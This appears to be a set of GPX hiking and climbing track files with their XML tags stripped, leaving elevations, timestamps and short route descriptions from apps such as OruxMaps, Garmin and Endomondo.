+2014-12-20T09:59:52Z
+
+1313.95
+2014-12-20T10:01:45Z
+
+1345.56
+2014-12-20T10:04:37Z
+
+1397.59
+2014-12-20T10:10:02Z
+
+1449.93
+2014-12-20T10:15:20Z
+
+1467.35
+2014-12-20T10:17:08Z
+
+1475.89
+2014-12-20T10:18:03Z
+
+1541.36
+2014-12-20T10:36:54Z
+
+1526.58
+2014-12-20T10:38:25Z
+
+1469.46
+2014-12-20T10:42:36Z
+
+1450.92
+2014-12-20T10:44:03Z
+
+1394.24
+2014-12-20T10:47:36Z
+
+1369.38
+2014-12-20T10:49:14Z
+
+1325.47
+2014-12-20T10:53:22Z
+
+1300.59
+2014-12-20T10:54:41Z
+
+1289.45
+2014-12-20T10:55:23Z
+
+1278.07
+2014-12-20T10:56:09Z
+
+1260.32
+2014-12-20T10:57:17Z
+
+1251.81
+2014-12-20T10:59:19Z
+
+1239.07
+2014-12-20T11:00:38Z
+
+1231.12
+2014-12-20T11:01:05Z
+
+1225.99
+2014-12-20T11:01:24Z
+
+1217.41
+2014-12-20T11:04:17Z
+
+1218.1
+2014-12-20T11:04:55Z
+
+1214.2
+2014-12-20T11:06:34Z
+
+1218.51
+2014-12-20T11:09:25Z
+
+1211.26
+2014-12-20T11:13:41Z
+
+1209.4
+2014-12-20T11:15:41Z
+
+1209.17
+2014-12-20T11:18:33Z
+
+1208.0
+2014-12-20T11:19:13Z
+
+1207.34
+2014-12-20T11:20:07Z
+
+1194.09
+2014-12-20T11:23:55Z
+
+1194.17
+2014-12-20T11:24:33Z
+
+1191.69
+2014-12-20T11:26:06Z
+
+1187.96
+2014-12-20T11:27:24Z
+
+1188.68
+2014-12-20T11:28:55Z
+
+1187.58
+2014-12-20T11:30:16Z
+
+1187.42
+2014-12-20T11:31:59Z
+
+1184.2
+2014-12-20T11:34:29Z
+
+1179.66
+2014-12-20T11:38:31Z
+
+1179.27
+2014-12-20T11:39:52Z
+
+1181.0
+2014-12-20T11:41:11Z "
+"
+
+
+
+Marcin Michalik
+
+
+
+
+Endomondo
+2014-03-22T19:57:34Z
+
+http://www.endomondo.com/
+
+endomondo
+CLIMBING
+
+
+2014-03-22T11:23:41Z
+
+
+531.7
+2014-03-22T11:25:42Z
+
+
+544.0
+2014-03-22T11:29:20Z
+
+
+538.0
+2014-03-22T11:30:17Z
+
+
+541.2
+2014-03-22T11:31:22Z
+
+
+545.1
+2014-03-22T11:31:52Z
+
+
+548.6
+2014-03-22T11:32:37Z
+
+
+562.9
+2014-03-22T11:33:09Z
+
+
+556.1
+2014-03-22T11:34:34Z
+
+
+571.7
+2014-03-22T11:36:36Z
+
+
+600.5
+2014-03-22T11:37:33Z
+
+
+583.5
+2014-03-22T11:39:02Z
+
+
+580.4
+2014-03-22T11:39:50Z
+
+
+576.5
+2014-03-22T11:41:25Z
+
+
+586.6
+2014-03-22T11:42:28Z
+
+
+590.0
+2014-03-22T11:43:54Z
+
+
+602.4
+2014-03-22T11:45:10Z
+
+
+619.8
+2014-03-22T11:47:44Z
+
+
+656.4
+2014-03-22T11:50:40Z
+
+
+630.1
+2014-03-22T11:53:13Z
+
+
+625.3
+2014-03-22T11:54:49Z
+
+
+615.6
+2014-03-22T12:05:51Z
+
+
+625.9
+2014-03-22T12:08:50Z
+
+
+602.0
+2014-03-22T12:22:15Z
+
+
+615.3
+2014-03-22T12:23:33Z
+
+
+622.8
+2014-03-22T12:25:28Z
+
+
+644.1
+2014-03-22T12:30:12Z
+
+
+652.3
+2014-03-22T12:34:10Z
+
+
+682.0
+2014-03-22T12:42:58Z
+
+
+690.9
+2014-03-22T13:01:07Z
+
+
+678.8
+2014-03-22T13:08:24Z
+
+
+757.3
+2014-03-22T13:56:48Z
+
+
+728.6
+2014-03-22T14:14:25Z
+
+
+726.6
+2014-03-22T14:18:06Z
+
+
+776.0
+2014-03-22T14:22:31Z
+
+
+762.4
+2014-03-22T15:10:49Z
+
+
+772.5
+2014-03-22T15:18:43Z
+
+
+806.6
+2014-03-22T15:23:17Z
+
+
+815.2
+2014-03-22T15:24:50Z
+
+
+829.4
+2014-03-22T15:26:14Z
+
+
+863.1
+2014-03-22T15:35:32Z
+
+
+854.5
+2014-03-22T15:36:47Z
+
+
+826.3
+2014-03-22T15:38:57Z
+
+
+809.6
+2014-03-22T15:39:54Z
+
+
+783.2
+2014-03-22T15:42:51Z
+
+
+762.4
+2014-03-22T15:43:42Z
+
+
+745.4
+2014-03-22T15:45:32Z
+
+
+710.1
+2014-03-22T15:48:01Z
+
+
+690.8
+2014-03-22T15:49:19Z
+
+
+689.5
+2014-03-22T15:49:37Z
+
+
+662.8
+2014-03-22T15:52:04Z
+
+
+657.7
+2014-03-22T15:53:28Z
+
+
+630.8
+2014-03-22T15:54:52Z
+
+
+597.6
+2014-03-22T15:56:58Z
+
+
+578.6
+2014-03-22T15:57:44Z
+
+
+575.4
+2014-03-22T15:59:05Z
+
+
+572.6
+2014-03-22T16:00:36Z
+
+
+549.1
+2014-03-22T16:02:43Z
+
+
+547.8
+2014-03-22T16:03:43Z
+
+
+534.2
+2014-03-22T16:05:20Z
+
+
+525.8
+2014-03-22T16:07:39Z
+
+
+533.1
+2014-03-22T16:08:22Z
+
+
+2014-03-22T16:13:10Z
+
+
+
+2014-03-22T16:13:11Z
+ "
+"
+
+
+
+
+
+
+CompeGPS TEAM, SL
+2016-06-23T10:47:10Z
+
+
+Riffelseeweg
+Die Wasseroberfläche des Riffelsee ist meist ruhig. Ideal f_rs Fotoshooting. In dieser urt_mlichen Alpenlandschaft lässt sich der Alltag im Tal unten vergessen. Das Lichtspiel mit den Wolken am Himmel, der weite Horizont, der Blick zu den h_chsten Bergen des ganzen Alpenbogens _ das alles sagt: Ich komme wieder. Ganz sicher.<br /><br />
+<ul>
+<li>Riffelsee: das sch_nste Fotosujet mit Matterhornspiegelung</li>
+<li>f_r Kinder ab 4 Jahren</li>
+<li>am Riffelhorn: Kletterrouten f_r K_nner</li>
+<li>reiche Alpenflora</li>
+<li>je nach Jahreszeit: Wild zum Beobachten (Steinb_cke im Gebiet Gaggenhaupt)</li>
+</ul>
+
+
+
+3056.8
+2016-06-23T10:43:55Z
+
+
+2926.4
+2016-06-23T10:43:55Z
+
+
+2925.6
+2016-06-23T10:43:55Z
+
+
+2904.1
+2016-06-23T10:43:55Z
+
+
+2885.7
+2016-06-23T10:43:55Z
+
+
+2883.8
+2016-06-23T10:43:55Z
+
+
+2877.3
+2016-06-23T10:43:55Z
+
+
+2814.1
+
+
+2802.3
+
+
+2786.8
+
+
+2781.3
+
+
+2773.2
+
+
+2766.0
+
+
+2765.2
+
+
+2761.7
+
+
+2744.8
+
+
+2742.8
+
+
+2736.2
+
+
+2701.6
+
+
+2694.9
+
+
+2655.4
+
+
+2612.7
+
+
+2587.5
+
+
+2568.3
+
+
+2567.9
+
+
+2578.4
+
+
+2580.3
+
+
+2592.2
+
+
+2591.6
+
+
+2596.0
+
+
+2588.2
+
+
+2589.4
+
+
+2583.3
+
+
+2580.9
+
+
+2577.5
+
+
+2577.0
+
+
+2583.9
+
+
+2578.7
+ "
+"
+
+
+Mono Lake South Tufa and Navy Beach
+
+360gps
+
+360gps on GPSies.com
+GPSiesUserOnWeb
+
+
+Mono Lake South Tufa and Navy Beach on GPSies.com
+trackOnWeb
+2014-01-20T19:34:04Z
+
+round trip
+9.0
+2525.708602173442
+1948.0
+1956.0
+10.0
+
+Mono Lake South Tufa and Navy Beach on GPSies.com
+
+trackOnWeb
+
+
+1956.0
+2010-01-01T00:00:00Z
+
+
+1956.0
+2010-01-01T00:00:07Z
+
+
+1954.0
+2010-01-01T00:00:45Z
+
+
+1952.0
+2010-01-01T00:01:36Z
+
+
+1949.0
+2010-01-01T00:02:13Z
+
+
+1948.0
+2010-01-01T00:02:38Z
+
+
+1949.0
+2010-01-01T00:02:57Z
+
+
+1948.0
+2010-01-01T00:03:09Z
+
+
+1949.0
+2010-01-01T00:03:24Z
+
+
+1949.0
+2010-01-01T00:03:47Z
+
+
+1949.0
+2010-01-01T00:04:17Z
+
+
+1949.0
+2010-01-01T00:04:38Z
+
+
+1949.0
+2010-01-01T00:04:46Z
+
+
+1949.0
+2010-01-01T00:04:55Z
+
+
+1949.0
+2010-01-01T00:05:27Z
+
+
+1950.0
+2010-01-01T00:06:16Z
+
+
+1950.0
+2010-01-01T00:06:30Z
+
+
+1950.0
+2010-01-01T00:07:51Z
+
+
+1950.0
+2010-01-01T00:09:07Z
+
+
+1950.0
+2010-01-01T00:09:30Z
+
+
+1949.0
+2010-01-01T00:10:01Z
+
+
+1949.0
+2010-01-01T00:10:24Z
+
+
+1949.0
+2010-01-01T00:10:39Z
+
+
+1950.0
+2010-01-01T00:10:48Z
+
+
+1949.0
+2010-01-01T00:11:04Z
+
+
+1950.0
+2010-01-01T00:11:26Z
+
+
+1950.0
+2010-01-01T00:11:46Z
+
+
+1950.0
+2010-01-01T00:13:11Z
+
+
+1951.0
+2010-01-01T00:13:27Z
+
+
+1953.0
+2010-01-01T00:13:49Z
+
+
+1954.0
+2010-01-01T00:14:07Z
+
+
+1954.0
+2010-01-01T00:14:21Z
+
+
+1955.0
+2010-01-01T00:14:49Z
+
+
+1955.0
+2010-01-01T00:15:09Z
+ "
+"
+
+
+Lance Sud de Malissard
+
+
+
+
+
+OruxMaps
+2015-11-05T09:09:09Z
+
+
+Lance Sud de Malissard
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Lance Sud de Malissard</h2><br /><p>Startzeit: 11/05/2015 10:09</p><p>Zielzeit: 11/05/2015 13:00</p><p>Strecke: 6,3km (02:51)</p><p>Bewegungszeit: 01:53</p><p>Ø-Geschwindigkeit: 2,2km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 7,1km/h</p><p>Minimale Höhe: 990m</p><p>Maximale Höhe: 2044m</p><p>Steig-Geschw.: 456,2m/h</p><p>Sink-Geschw.: -226,6m/h</p><p>Aufstieg: 1096m</p><p>Abstieg: -82m</p><p>Steigzeit: 02:24</p><p>Sinkzeit: 00:21</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1031.63
+2015-11-05T09:09:10Z
+
+
+1004.55
+2015-11-05T09:10:14Z
+
+
+999.8
+2015-11-05T09:13:27Z
+
+
+1000.38
+2015-11-05T09:13:46Z
+
+
+1009.79
+2015-11-05T09:14:59Z
+
+
+1028.88
+2015-11-05T09:16:57Z
+
+
+1055.41
+2015-11-05T09:19:20Z
+
+
+1052.37
+2015-11-05T09:21:05Z
+
+
+1057.87
+2015-11-05T09:21:49Z
+
+
+1084.47
+2015-11-05T09:24:09Z
+
+
+1143.38
+2015-11-05T09:30:13Z
+
+
+1150.87
+2015-11-05T09:32:11Z
+
+
+1159.31
+2015-11-05T09:33:37Z
+
+
+1186.76
+2015-11-05T09:37:07Z
+
+
+1186.38
+2015-11-05T09:37:40Z
+
+
+1189.89
+2015-11-05T09:39:33Z
+
+
+1189.26
+2015-11-05T09:40:09Z
+
+
+1206.4
+2015-11-05T09:41:37Z
+
+
+1202.35
+2015-11-05T09:42:30Z
+
+
+1207.76
+2015-11-05T09:43:44Z
+
+
+1210.41
+2015-11-05T09:44:32Z
+
+
+1218.1
+2015-11-05T09:45:35Z
+
+
+1231.88
+2015-11-05T09:46:45Z
+
+
+1236.49
+2015-11-05T09:49:08Z
+
+
+1238.78
+2015-11-05T09:50:35Z
+
+
+1262.12
+2015-11-05T09:56:14Z
+
+
+1266.01
+2015-11-05T09:58:14Z
+
+
+1280.87
+2015-11-05T10:03:13Z
+
+
+1308.11
+2015-11-05T10:04:57Z
+
+
+1327.38
+2015-11-05T10:07:48Z
+
+
+1329.38
+2015-11-05T10:08:17Z
+
+
+1347.91
+2015-11-05T10:09:53Z
+
+
+1364.89
+2015-11-05T10:13:22Z
+
+
+1387.12
+2015-11-05T10:15:51Z
+
+
+1399.1
+2015-11-05T10:17:14Z
+
+
+1407.38
+2015-11-05T10:18:01Z
+
+
+1417.5
+2015-11-05T10:19:23Z
+
+
+1442.25
+2015-11-05T10:23:52Z
+
+
+1467.76
+2015-11-05T10:27:31Z
+
+
+1481.86
+2015-11-05T10:28:58Z
+
+
+1484.84
+2015-11-05T10:29:33Z
+
+
+1476.83
+2015-11-05T10:32:23Z
+
+
+1530.32
+2015-11-05T10:36:01Z
+
+
+1533.66
+2015-11-05T10:37:29Z
+
+
+1559.29
+2015-11-05T10:41:09Z
+
+
+1582.98
+2015-11-05T10:43:35Z
+
+
+1605.9
+2015-11-05T10:46:29Z
+
+
+1601.21
+2015-11-05T10:47:36Z
+
+
+1628.63
+2015-11-05T10:51:41Z
+
+
+1623.01
+2015-11-05T10:52:58Z
+
+
+1631.88
+2015-11-05T10:54:46Z
+
+
+1646.87
+2015-11-05T10:55:57Z
+
+
+1672.37
+2015-11-05T10:59:19Z
+
+
+1664.35
+2015-11-05T11:00:43Z
+
+
+1680.23
+2015-11-05T11:02:03Z
+
+
+1712.78
+2015-11-05T11:04:59Z
+
+
+1737.78
+2015-11-05T11:07:53Z
+
+
+1743.92
+2015-11-05T11:09:23Z
+
+
+1768.71
+2015-11-05T11:10:38Z
+
+
+1783.9
+2015-11-05T11:12:01Z
+
+
+1800.38
+2015-11-05T11:14:35Z
+
+
+1815.33
+2015-11-05T11:17:43Z
+
+
+1835.11
+2015-11-05T11:19:52Z
+
+
+1864.84
+2015-11-05T11:23:11Z
+
+
+1883.88
+2015-11-05T11:25:57Z
+
+
+1887.39
+2015-11-05T11:27:44Z
+
+
+1903.38
+2015-11-05T11:34:21Z
+
+
+1974.5
+2015-11-05T11:47:17Z
+
+
+2010.53
+2015-11-05T11:54:24Z
+
+
+2041.85
+2015-11-05T11:58:53Z
+
+
+2044.38
+2015-11-05T12:00:47Z
+ "
+"
+
+
+Gaviola
+
+
+
+
+
+OruxMaps
+2015-08-17T12:15:51Z
+
+
+Gaviola
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Gaviola</h2><br /><p>Startzeit: 08/17/2015 14:15</p><p>Zielzeit: 08/17/2015 15:29</p><p>Strecke: 2,1km (01:13)</p><p>Bewegungszeit: 00:38</p><p>Ø-Geschwindigkeit: 1,8km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 5,8km/h</p><p>Minimale Höhe: 2613m</p><p>Maximale Höhe: 3017m</p><p>Steig-Geschw.: 389,9m/h</p><p>Sink-Geschw.: -73,8m/h</p><p>Aufstieg: 400m</p><p>Abstieg: -9m</p><p>Steigzeit: 01:01</p><p>Sinkzeit: 00:07</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2615.31
+2015-08-17T12:15:53Z
+
+
+2622.35
+2015-08-17T12:17:40Z
+
+
+2615.42
+2015-08-17T12:19:25Z
+
+
+2617.5
+2015-08-17T12:22:33Z
+
+
+2617.86
+2015-08-17T12:24:34Z
+
+
+2621.89
+2015-08-17T12:25:45Z
+
+
+2622.04
+2015-08-17T12:26:40Z
+
+
+2632.38
+2015-08-17T12:30:07Z
+
+
+2636.87
+2015-08-17T12:30:44Z
+
+
+2643.33
+2015-08-17T12:31:56Z
+
+
+2648.38
+2015-08-17T12:32:31Z
+
+
+2657.16
+2015-08-17T12:33:36Z
+
+
+2660.23
+2015-08-17T12:33:56Z
+
+
+2682.88
+2015-08-17T12:36:46Z
+
+
+2704.29
+2015-08-17T12:39:15Z
+
+
+2708.88
+2015-08-17T12:41:24Z
+
+
+2718.89
+2015-08-17T12:42:30Z
+
+
+2726.82
+2015-08-17T12:43:35Z
+
+
+2740.38
+2015-08-17T12:44:54Z
+
+
+2757.28
+2015-08-17T12:47:15Z
+
+
+2779.88
+2015-08-17T12:50:20Z
+
+
+2782.23
+2015-08-17T12:51:07Z
+
+
+2797.41
+2015-08-17T12:53:19Z
+
+
+2819.42
+2015-08-17T12:56:44Z
+
+
+2840.5
+2015-08-17T13:00:01Z
+
+
+2850.33
+2015-08-17T13:01:29Z
+
+
+2874.38
+2015-08-17T13:05:16Z
+
+
+2877.51
+2015-08-17T13:07:29Z
+
+
+2907.38
+2015-08-17T13:10:57Z
+
+
+2917.39
+2015-08-17T13:12:18Z
+
+
+2936.88
+2015-08-17T13:17:25Z
+
+
+2962.4
+2015-08-17T13:22:05Z
+
+
+2996.85
+2015-08-17T13:25:22Z
+
+
+3017.26
+2015-08-17T13:29:17Z
+ "
+"
+
+
+gottertli 2018-03
+
+
+
+
+
+
+gottertli 2018-03
+
+
+
+437.4
+
+
+439.3999856651063
+
+
+464.1999229357155
+
+
+479.0999110959082
+
+
+510.5740824982823
+
+
+509.02927862144406
+
+
+538.2
+
+
+549.4999577291021
+
+
+554.7214073768222
+
+
+569.6999749226607
+
+
+569.9557117817975
+
+
+579.700038827597
+
+
+592.8
+
+
+599.5000971077948
+
+
+610.3999264443352
+
+
+623.6000214680271
+
+
+632.8998227965031
+
+
+652.7999219265442
+
+
+668.1521118705778
+
+
+712.8999434532875
+
+
+719.8999934847567
+
+
+724.7340563172894
+
+
+736.6493288164438
+
+
+747.8702934009364
+
+
+762.7000412525525
+
+
+774.6999995138465
+
+
+803.5999660258179
+
+
+848.8998553744841
+
+
+870.2999949126216
+
+
+914.0001145427286
+
+
+934.9898790063938
+
+
+958.0998869136927
+
+
+995.3002116572903
+
+
+1043.5
+
+
+1050.8001079207272
+
+
+1060.2728846249213
+
+
+1105.6000998743848
+
+
+1133.6999433206227
+
+
+1189.8
+
+
+1198.8
+
+
+1221.1056208287357
+
+
+1231.8
+
+
+1244.1948823040984
+
+
+1256.6072538610538
+
+
+1259.8670857723198
+
+
+1275.199854349075
+
+
+1287.8000333888588
+
+
+1310.2925811368073
+
+
+1316.862384626651
+
+
+1328.9257517207702
+
+
+1330.4058545615146
+
+
+1342.2
+
+
+1350.4999464740858
+
+
+1373.4000152222243
+
+
+1376.6001741434604
+
+
+1341.7999726647276
+
+
+1278.1999765603111
+
+
+1270.6000651541203
+
+
+1236.8999291065184
+
+
+1207.1000169742981
+
+
+1196.9934783160888
+
+
+1189.699864983555
+
+
+1166.3999340513399
+
+
+1162.1
+
+
+1157.7
+
+
+1150.4998275567677
+
+
+1135.5
+
+
+1141.4
+ "
+"
+
+
+
+
+
+
+
+2016-07-23 14:33:09
+
+
+
+2198.19
+
+
+2197.71
+
+
+2199.63
+
+
+2201.56
+
+
+2201.56
+
+
+2201.08
+
+
+2201.08
+
+
+2200.59
+
+
+2202.52
+
+
+2202.52
+
+
+2197.23
+
+
+2188.58
+
+
+2181.37
+
+
+2182.33
+
+
+2193.39
+
+
+2208.29
+
+
+2214.53
+
+
+2217.42
+
+
+2225.11
+
+
+2251.06
+
+
+2254.91
+
+
+2257.79
+
+
+2260.2
+
+
+2261.64
+
+
+2263.08
+
+
+2265.96
+
+
+2270.29
+
+
+2272.69
+
+
+2275.58
+
+
+2280.38
+
+
+2285.67
+
+
+2289.52
+
+
+2290.96
+
+
+2293.84
+
+
+2297.69
+
+
+2301.05
+
+
+2305.86
+
+
+2309.22
+
+
+2317.4
+
+
+2319.32
+
+
+2325.57
+
+
+2337.1
+
+
+2339.51
+
+
+2350.56
+
+
+2372.19
+
+
+2373.15
+
+
+2376.04
+
+
+2376.52
+
+
+2380.84
+
+
+2387.57
+
+
+2385.65
+
+
+2404.39
+
+
+2426.99
+
+
+2428.43
+
+
+2436.6
+
+
+2448.62
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+20.02.2016, 4.97km (autom. speichern)
+
+
+
+735.4
+2016-02-20T08:46:51Z
+
+
+782.53
+2016-02-20T08:46:52Z
+
+
+798.13
+2016-02-20T08:49:02Z
+
+
+814.39
+2016-02-20T08:50:38Z
+
+
+840.62
+2016-02-20T08:54:11Z
+
+
+842.82
+2016-02-20T08:55:19Z
+
+
+875.23
+2016-02-20T08:58:57Z
+
+
+885.58
+2016-02-20T09:00:43Z
+
+
+911.49
+2016-02-20T09:02:31Z
+
+
+923.33
+2016-02-20T09:04:26Z
+
+
+934.75
+2016-02-20T09:08:16Z
+
+
+938.33
+2016-02-20T09:10:04Z
+
+
+991.23
+2016-02-20T09:13:38Z
+
+
+1006.4
+2016-02-20T09:15:30Z
+
+
+1035.89
+2016-02-20T09:18:53Z
+
+
+1041.04
+2016-02-20T09:20:10Z
+
+
+1059.96
+2016-02-20T09:21:45Z
+
+
+1064.21
+2016-02-20T09:23:19Z
+
+
+1099.81
+2016-02-20T09:25:25Z
+
+
+1115.34
+2016-02-20T09:27:16Z
+
+
+1120.0
+2016-02-20T09:31:12Z
+
+
+1172.77
+2016-02-20T09:35:30Z
+
+
+1178.96
+2016-02-20T09:36:18Z
+
+
+1202.64
+2016-02-20T09:38:55Z
+
+
+1224.03
+2016-02-20T09:41:25Z
+
+
+1231.11
+2016-02-20T09:41:53Z
+
+
+1239.06
+2016-02-20T09:43:06Z
+
+
+1257.66
+2016-02-20T09:44:22Z
+
+
+1287.09
+2016-02-20T09:50:40Z
+
+
+1345.53
+2016-02-20T09:59:34Z
+
+
+1367.44
+2016-02-20T10:01:57Z
+
+
+1393.3
+2016-02-20T10:06:03Z
+
+
+1403.5
+2016-02-20T10:08:01Z
+
+
+1415.99
+2016-02-20T10:10:07Z
+
+
+1426.74
+2016-02-20T10:11:42Z
+
+
+1428.66
+2016-02-20T10:12:26Z
+
+
+1440.19
+2016-02-20T10:14:19Z
+
+
+1439.04
+2016-02-20T10:29:33Z
+
+
+1443.09
+2016-02-20T10:31:49Z
+
+
+1440.11
+2016-02-20T10:32:50Z
+
+
+1442.06
+2016-02-20T10:34:11Z
+
+
+1440.3
+2016-02-20T10:34:41Z
+
+
+1435.46
+2016-02-20T10:35:52Z
+
+
+1435.05
+2016-02-20T10:38:27Z
+
+
+1436.32
+2016-02-20T10:38:55Z
+
+
+1435.62
+2016-02-20T10:39:21Z
+
+
+1440.16
+2016-02-20T10:39:53Z
+
+
+1441.19
+2016-02-20T10:39:54Z
+
+
+1448.58
+2016-02-20T10:40:30Z
+
+
+1441.37
+2016-02-20T11:03:28Z
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2016-04-21T13:39:24Z
+
+Borgio Wandern
+Zustieg zum Klettergarten Rocce dell'Orera
+
+
+
+255.39999389648438
+2016-04-21T13:39:24Z
+
+
+
+
+
+247.60000610351562
+2016-04-21T13:40:56Z
+
+
+
+
+
+244.39999389648438
+2016-04-21T13:42:29Z
+
+
+
+
+
+234.1999969482422
+2016-04-21T13:43:13Z
+
+
+
+
+
+223.60000610351562
+2016-04-21T13:44:12Z
+
+
+
+
+
+203.60000610351562
+2016-04-21T13:45:51Z
+
+
+
+
+
+184.39999389648438
+2016-04-21T13:47:23Z
+
+
+
+
+
+124.19999694824219
+2016-04-21T13:52:03Z
+
+
+
+
+
+103.80000305175781
+2016-04-21T13:53:27Z
+
+
+
+
+
+88.19999694824219
+2016-04-21T13:54:47Z
+
+
+
+
+
+69.80000305175781
+2016-04-21T13:56:11Z
+
+
+
+
+
+60.0
+2016-04-21T13:57:26Z
+
+
+
+
+
+46.400001525878906
+2016-04-21T13:59:03Z
+
+
+
+
+
+30.200000762939453
+2016-04-21T14:00:16Z
+
+
+
+
+
+15.0
+2016-04-21T14:01:28Z
+
+
+
+
+
+12.399999618530273
+2016-04-21T14:02:34Z
+
+
+
+
+
+13.0
+2016-04-21T14:03:10Z
+
+
+
+
+
+11.600000381469727
+2016-04-21T14:06:25Z
+
+
+
+
+
+12.0
+2016-04-21T14:07:13Z
+
+
+
+
+
+11.0
+2016-04-21T14:08:53Z
+
+
+
+
+
+11.800000190734863
+2016-04-21T14:09:10Z
+
+
+
+
+
+12.0
+2016-04-21T14:09:47Z
+
+
+
+
+
+12.0
+2016-04-21T14:12:57Z
+
+
+
+
+
+12.399999618530273
+2016-04-21T14:13:09Z
+
+
+
+
+
+15.199999809265137
+2016-04-21T14:21:14Z
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-21T06:57:39Z
+
+2015-07-21 08:56:57
+
+
+
+
+
+
+825.93
+2015-07-21T04:09:43Z
+
+
+827.44
+2015-07-21T04:11:27Z
+
+
+828.36
+2015-07-21T04:11:46Z
+
+
+830.2
+2015-07-21T04:12:19Z
+
+
+830.64
+2015-07-21T04:12:38Z
+
+
+831.02
+2015-07-21T04:13:15Z
+
+
+836.03
+2015-07-21T04:13:39Z
+
+
+852.17
+2015-07-21T04:14:58Z
+
+
+864.4
+2015-07-21T04:15:58Z
+
+
+879.45
+2015-07-21T04:17:15Z
+
+
+882.49
+2015-07-21T04:17:27Z
+
+
+888.15
+2015-07-21T04:17:58Z
+
+
+896.3
+2015-07-21T04:19:11Z
+
+
+897.33
+2015-07-21T04:19:46Z
+
+
+897.78
+2015-07-21T04:20:42Z
+
+
+899.85
+2015-07-21T04:21:24Z
+
+
+906.29
+2015-07-21T04:22:39Z
+
+
+932.05
+2015-07-21T04:24:54Z
+
+
+952.85
+2015-07-21T04:26:52Z
+
+
+968.97
+2015-07-21T04:28:19Z
+
+
+986.49
+2015-07-21T04:29:56Z
+
+
+998.44
+2015-07-21T04:31:01Z
+
+
+1021.48
+2015-07-21T04:33:04Z
+
+
+1025.64
+2015-07-21T04:33:28Z
+
+
+1027.74
+2015-07-21T04:33:43Z
+
+
+1035.12
+2015-07-21T04:34:28Z
+
+
+1058.26
+2015-07-21T04:36:45Z
+
+
+1082.2
+2015-07-21T04:38:57Z
+
+
+1091.3
+2015-07-21T04:39:57Z
+
+
+1108.36
+2015-07-21T04:42:01Z
+
+
+1112.13
+2015-07-21T04:42:26Z
+
+
+1118.5
+2015-07-21T04:42:57Z
+
+
+1123.91
+2015-07-21T04:43:35Z
+
+
+1131.22
+2015-07-21T04:44:23Z
+
+
+1136.22
+2015-07-21T04:45:00Z
+
+
+1141.14
+2015-07-21T04:45:32Z
+
+
+1142.24
+2015-07-21T04:47:49Z
+
+
+1146.68
+2015-07-21T04:49:17Z
+
+
+1147.67
+2015-07-21T04:49:29Z
+
+
+1156.8
+2015-07-21T04:50:35Z
+
+
+1173.23
+2015-07-21T04:52:17Z
+
+
+1179.67
+2015-07-21T04:53:21Z
+
+
+1185.83
+2015-07-21T04:54:38Z
+
+
+1196.64
+2015-07-21T04:55:36Z
+
+
+1200.37
+2015-07-21T04:56:15Z
+
+
+1201.65
+2015-07-21T04:56:45Z
+
+
+1207.95
+2015-07-21T04:57:32Z
+
+
+1214.05
+2015-07-21T04:58:12Z
+
+
+1222.83
+2015-07-21T04:59:54Z
+
+
+1232.78
+2015-07-21T05:01:37Z
+
+
+1250.33
+2015-07-21T05:03:24Z
+
+
+1267.08
+2015-07-21T05:06:08Z
+
+
+1272.79
+2015-07-21T05:07:20Z
+
+
+1326.75
+2015-07-21T05:20:41Z
+
+
+1367.44
+2015-07-21T05:24:29Z
+
+
+1383.93
+2015-07-21T05:26:49Z
+
+
+1405.89
+2015-07-21T05:29:24Z
+
+
+1447.85
+2015-07-21T05:32:59Z
+
+
+1457.55
+2015-07-21T05:34:15Z
+
+
+1486.8
+2015-07-21T05:36:48Z
+
+
+1511.2
+2015-07-21T05:39:01Z
+
+
+1553.88
+2015-07-21T05:42:33Z
+
+
+1578.16
+2015-07-21T05:44:26Z
+
+
+1603.29
+2015-07-21T05:46:56Z
+
+
+1636.85
+2015-07-21T06:25:32Z
+
+
+1694.54
+2015-07-21T06:32:07Z
+
+
+1806.13
+2015-07-21T06:44:14Z
+
+
+1840.92
+2015-07-21T06:56:56Z
+ "
+"
+
+
+
+
+
+
+
+Linie
+
+
+
+956.3
+
+
+965.7
+
+
+981.6
+
+
+984.4
+
+
+998.5
+
+
+1021.5
+
+
+1055.5
+
+
+1078.1
+
+
+1113.1
+
+
+1140.0
+
+
+1138.9
+
+
+1153.6
+
+
+1195.5
+
+
+1218.3
+
+
+1217.9
+
+
+1214.7
+
+
+1216.6
+
+
+1237.7
+
+
+1236.1
+
+
+1248.0
+
+
+1264.6
+
+
+1261.6
+
+
+1278.9
+
+
+1279.2
+
+
+1282.9
+
+
+1291.0
+
+
+1312.6
+
+
+1314.8
+
+
+1349.6
+
+
+1356.3
+
+
+1375.4
+
+
+1370.8
+
+
+1385.3
+
+
+1385.1
+
+
+1397.1
+
+
+1411.1
+
+
+1434.3
+
+
+1448.0
+
+
+1465.7
+
+
+1476.6
+
+
+1494.4
+
+
+1509.0
+
+
+1522.7
+
+
+1535.6
+
+
+1542.7
+
+
+1555.9
+
+
+1563.2
+
+
+1583.7
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-14T18:08:55Z
+
+2015-04-14 20:08:51
+
+
+
+
+
+
+826.05
+2015-04-14T16:16:41Z
+
+
+827.2
+2015-04-14T16:18:10Z
+
+
+826.29
+2015-04-14T16:20:11Z
+
+
+833.08
+2015-04-14T16:22:37Z
+
+
+837.19
+2015-04-14T16:23:27Z
